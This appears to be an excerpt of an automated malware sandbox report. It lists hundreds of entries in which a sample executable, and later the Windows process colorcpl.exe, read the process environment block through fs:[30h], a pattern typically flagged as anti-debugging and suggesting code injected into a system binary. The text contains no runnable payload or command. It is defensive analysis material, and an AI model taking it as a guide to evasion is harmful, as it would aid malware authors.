Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143B8D0 mov eax, dword ptr fs:[00000030h] 2_2_0143B8D0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h] 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h] 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h] 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h] 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h] 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D20A0 mov eax, dword ptr fs:[00000030h] 2_2_013D20A0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B849B mov eax, dword ptr fs:[00000030h] 2_2_013B849B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h] 2_2_01426CF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h] 2_2_01426CF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01426CF0 mov eax, dword ptr fs:[00000030h] 2_2_01426CF0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A9080 mov eax, dword ptr fs:[00000030h] 2_2_013A9080
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014614FB mov eax, dword ptr fs:[00000030h] 2_2_014614FB
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01423884 mov eax, dword ptr fs:[00000030h] 2_2_01423884
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01423884 mov eax, dword ptr fs:[00000030h] 2_2_01423884
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A58EC mov eax, dword ptr fs:[00000030h] 2_2_013A58EC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DE730 mov eax, dword ptr fs:[00000030h] 2_2_013DE730
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h] 2_2_013A4F2E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A4F2E mov eax, dword ptr fs:[00000030h] 2_2_013A4F2E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01478B58 mov eax, dword ptr fs:[00000030h] 2_2_01478B58
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CF716 mov eax, dword ptr fs:[00000030h] 2_2_013CF716
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01478F6A mov eax, dword ptr fs:[00000030h] 2_2_01478F6A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h] 2_2_013DA70E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DA70E mov eax, dword ptr fs:[00000030h] 2_2_013DA70E
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h] 2_2_013D3B7A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D3B7A mov eax, dword ptr fs:[00000030h] 2_2_013D3B7A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0147070D mov eax, dword ptr fs:[00000030h] 2_2_0147070D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0147070D mov eax, dword ptr fs:[00000030h] 2_2_0147070D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h] 2_2_0143FF10
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143FF10 mov eax, dword ptr fs:[00000030h] 2_2_0143FF10
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013ADB60 mov ecx, dword ptr fs:[00000030h] 2_2_013ADB60
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BFF60 mov eax, dword ptr fs:[00000030h] 2_2_013BFF60
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146131B mov eax, dword ptr fs:[00000030h] 2_2_0146131B
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AF358 mov eax, dword ptr fs:[00000030h] 2_2_013AF358
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013ADB40 mov eax, dword ptr fs:[00000030h] 2_2_013ADB40
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BEF40 mov eax, dword ptr fs:[00000030h] 2_2_013BEF40
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014253CA mov eax, dword ptr fs:[00000030h] 2_2_014253CA
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014253CA mov eax, dword ptr fs:[00000030h] 2_2_014253CA
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h] 2_2_013D4BAD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h] 2_2_013D4BAD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D4BAD mov eax, dword ptr fs:[00000030h] 2_2_013D4BAD
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D2397 mov eax, dword ptr fs:[00000030h] 2_2_013D2397
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DB390 mov eax, dword ptr fs:[00000030h] 2_2_013DB390
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B8794 mov eax, dword ptr fs:[00000030h] 2_2_013B8794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h] 2_2_013B1B8F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B1B8F mov eax, dword ptr fs:[00000030h] 2_2_013B1B8F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0145D380 mov ecx, dword ptr fs:[00000030h] 2_2_0145D380
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E37F5 mov eax, dword ptr fs:[00000030h] 2_2_013E37F5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146138A mov eax, dword ptr fs:[00000030h] 2_2_0146138A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CDBE9 mov eax, dword ptr fs:[00000030h] 2_2_013CDBE9
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01427794 mov eax, dword ptr fs:[00000030h] 2_2_01427794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01427794 mov eax, dword ptr fs:[00000030h] 2_2_01427794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01427794 mov eax, dword ptr fs:[00000030h] 2_2_01427794
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h] 2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h] 2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h] 2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h] 2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h] 2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D03E2 mov eax, dword ptr fs:[00000030h] 2_2_013D03E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01475BA5 mov eax, dword ptr fs:[00000030h] 2_2_01475BA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h] 2_2_0146AE44
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146AE44 mov eax, dword ptr fs:[00000030h] 2_2_0146AE44
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h] 2_2_013E4A2C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E4A2C mov eax, dword ptr fs:[00000030h] 2_2_013E4A2C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0146EA55 mov eax, dword ptr fs:[00000030h] 2_2_0146EA55
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01434257 mov eax, dword ptr fs:[00000030h] 2_2_01434257
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AE620 mov eax, dword ptr fs:[00000030h] 2_2_013AE620
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013C3A1C mov eax, dword ptr fs:[00000030h] 2_2_013C3A1C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h] 2_2_013DA61C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DA61C mov eax, dword ptr fs:[00000030h] 2_2_013DA61C
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h] 2_2_0145B260
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0145B260 mov eax, dword ptr fs:[00000030h] 2_2_0145B260
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01478A62 mov eax, dword ptr fs:[00000030h] 2_2_01478A62
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h] 2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A5210 mov ecx, dword ptr fs:[00000030h] 2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h] 2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A5210 mov eax, dword ptr fs:[00000030h] 2_2_013A5210
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h] 2_2_013AAA16
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AAA16 mov eax, dword ptr fs:[00000030h] 2_2_013AAA16
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B8A0A mov eax, dword ptr fs:[00000030h] 2_2_013B8A0A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h] 2_2_013AC600
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h] 2_2_013AC600
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013AC600 mov eax, dword ptr fs:[00000030h] 2_2_013AC600
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D8E00 mov eax, dword ptr fs:[00000030h] 2_2_013D8E00
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E927A mov eax, dword ptr fs:[00000030h] 2_2_013E927A
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01461608 mov eax, dword ptr fs:[00000030h] 2_2_01461608
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h] 2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h] 2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h] 2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h] 2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013CAE73 mov eax, dword ptr fs:[00000030h] 2_2_013CAE73
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B766D mov eax, dword ptr fs:[00000030h] 2_2_013B766D
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h] 2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h] 2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h] 2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A9240 mov eax, dword ptr fs:[00000030h] 2_2_013A9240
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0145FE3F mov eax, dword ptr fs:[00000030h] 2_2_0145FE3F
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h] 2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h] 2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h] 2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h] 2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h] 2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B7E41 mov eax, dword ptr fs:[00000030h] 2_2_013B7E41
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0145FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0145FEC0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h] 2_2_013BAAB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013BAAB0 mov eax, dword ptr fs:[00000030h] 2_2_013BAAB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DFAB0 mov eax, dword ptr fs:[00000030h] 2_2_013DFAB0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01478ED6 mov eax, dword ptr fs:[00000030h] 2_2_01478ED6
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h] 2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h] 2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h] 2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h] 2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013A52A5 mov eax, dword ptr fs:[00000030h] 2_2_013A52A5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h] 2_2_013DD294
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013DD294 mov eax, dword ptr fs:[00000030h] 2_2_013DD294
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_0143FE87 mov eax, dword ptr fs:[00000030h] 2_2_0143FE87
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013B76E2 mov eax, dword ptr fs:[00000030h] 2_2_013B76E2
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D2AE4 mov eax, dword ptr fs:[00000030h] 2_2_013D2AE4
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D16E0 mov ecx, dword ptr fs:[00000030h] 2_2_013D16E0
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h] 2_2_01470EA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h] 2_2_01470EA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_01470EA5 mov eax, dword ptr fs:[00000030h] 2_2_01470EA5
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_014246A7 mov eax, dword ptr fs:[00000030h] 2_2_014246A7
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D36CC mov eax, dword ptr fs:[00000030h] 2_2_013D36CC
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013D2ACB mov eax, dword ptr fs:[00000030h] 2_2_013D2ACB
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe Code function: 2_2_013E8EC7 mov eax, dword ptr fs:[00000030h] 2_2_013E8EC7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471746D mov eax, dword ptr fs:[00000030h] 15_2_0471746D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h] 15_2_0478C450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0478C450 mov eax, dword ptr fs:[00000030h] 15_2_0478C450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472A44B mov eax, dword ptr fs:[00000030h] 15_2_0472A44B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0472BC2C mov eax, dword ptr fs:[00000030h] 15_2_0472BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C740D mov eax, dword ptr fs:[00000030h] 15_2_047C740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C740D mov eax, dword ptr fs:[00000030h] 15_2_047C740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C740D mov eax, dword ptr fs:[00000030h] 15_2_047C740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B1C06 mov eax, dword ptr fs:[00000030h] 15_2_047B1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h] 15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h] 15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h] 15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776C0A mov eax, dword ptr fs:[00000030h] 15_2_04776C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047B14FB mov eax, dword ptr fs:[00000030h] 15_2_047B14FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h] 15_2_04776CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h] 15_2_04776CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776CF0 mov eax, dword ptr fs:[00000030h] 15_2_04776CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C8CD6 mov eax, dword ptr fs:[00000030h] 15_2_047C8CD6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470849B mov eax, dword ptr fs:[00000030h] 15_2_0470849B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h] 15_2_0471C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0471C577 mov eax, dword ptr fs:[00000030h] 15_2_0471C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04717D50 mov eax, dword ptr fs:[00000030h] 15_2_04717D50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04733D43 mov eax, dword ptr fs:[00000030h] 15_2_04733D43
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04773540 mov eax, dword ptr fs:[00000030h] 15_2_04773540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047A3D40 mov eax, dword ptr fs:[00000030h] 15_2_047A3D40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0477A537 mov eax, dword ptr fs:[00000030h] 15_2_0477A537
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BE539 mov eax, dword ptr fs:[00000030h] 15_2_047BE539
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04703D34 mov eax, dword ptr fs:[00000030h] 15_2_04703D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C8D34 mov eax, dword ptr fs:[00000030h] 15_2_047C8D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h] 15_2_04724D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h] 15_2_04724D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04724D3B mov eax, dword ptr fs:[00000030h] 15_2_04724D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046FAD30 mov eax, dword ptr fs:[00000030h] 15_2_046FAD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047A8DF1 mov eax, dword ptr fs:[00000030h] 15_2_047A8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0470D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0470D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0470D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h] 15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h] 15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h] 15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047BFDE2 mov eax, dword ptr fs:[00000030h] 15_2_047BFDE2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h] 15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h] 15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h] 15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776DC9 mov ecx, dword ptr fs:[00000030h] 15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h] 15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04776DC9 mov eax, dword ptr fs:[00000030h] 15_2_04776DC9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h] 15_2_04721DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h] 15_2_04721DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04721DB5 mov eax, dword ptr fs:[00000030h] 15_2_04721DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C05AC mov eax, dword ptr fs:[00000030h] 15_2_047C05AC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047C05AC mov eax, dword ptr fs:[00000030h] 15_2_047C05AC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_047235A1 mov eax, dword ptr fs:[00000030h] 15_2_047235A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h] 15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h] 15_2_046F2D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_046F2D8A mov eax, dword ptr fs:[00000030h] 15_2_046F2D8A
